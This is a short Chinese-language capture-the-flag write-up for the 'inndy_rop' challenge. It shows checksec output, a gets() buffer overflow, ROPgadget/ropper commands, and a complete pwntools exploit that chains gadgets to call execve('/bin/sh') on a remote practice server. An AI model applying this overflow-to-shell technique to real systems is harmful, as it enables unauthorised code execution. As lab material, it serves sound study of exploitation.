inndy_rop
Ubuntu 16 来源:https://github.com/bash-c/pwn_repo
0x01
checksec
1 2 3 4 5 6 [*] '/home/zelas/Desktop/pwn/inndy_rop/rop' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled //栈不可执行 PIE: No PIE (0x8048000)
$ file rop rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e9ed96cd1a8ea3af86b7b73048c909236d570d9e, not stripped
静态编译
IDA
1 2 3 4 5 6 int overflow () { char v1[12 ]; return gets(v1); }
0x02
思路
1.用ropper | ROPgadget生成ropchain
ROPgadget --binary inndy_rop --ropchain
ropper --file inndy_rop --chain execve
2.溢出getshell
0x03
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 from pwn import *from struct import packcontext(log_level='debug' , os='linux' , arch='i386' ) io = remote('node4.buuoj.cn' , 27020 ) def rop_chain (): p = lambda x: pack('I' , x) IMAGE_BASE_0 = 0x08048000 rebase_0 = lambda x: p(x + IMAGE_BASE_0) rop = b'' rop += rebase_0(0x00070016 ) rop += b'//bi' rop += rebase_0(0x00026cda ) rop += rebase_0(0x000a2060 ) rop += rebase_0(0x0000c66b ) rop += rebase_0(0x00070016 ) rop += b'n/sh' rop += rebase_0(0x00026cda ) rop += rebase_0(0x000a2064 ) rop += rebase_0(0x0000c66b ) rop += rebase_0(0x00070016 ) rop += p(0x00000000 ) rop += rebase_0(0x00026cda ) rop += rebase_0(0x000a2068 ) rop += rebase_0(0x0000c66b ) rop += rebase_0(0x000001c9 ) rop += rebase_0(0x000a2060 ) rop += rebase_0(0x00096769 ) rop += rebase_0(0x000a2068 ) rop += rebase_0(0x00026cda ) rop += rebase_0(0x000a2068 ) rop += rebase_0(0x00070016 ) rop += p(0x0000000b ) rop += rebase_0(0x00027430 ) return rop shellcode = rop_chain() padding = 0xc + 0x4 payload = flat(b'a' * padding, shellcode) io.sendline(payload) io.interactive()
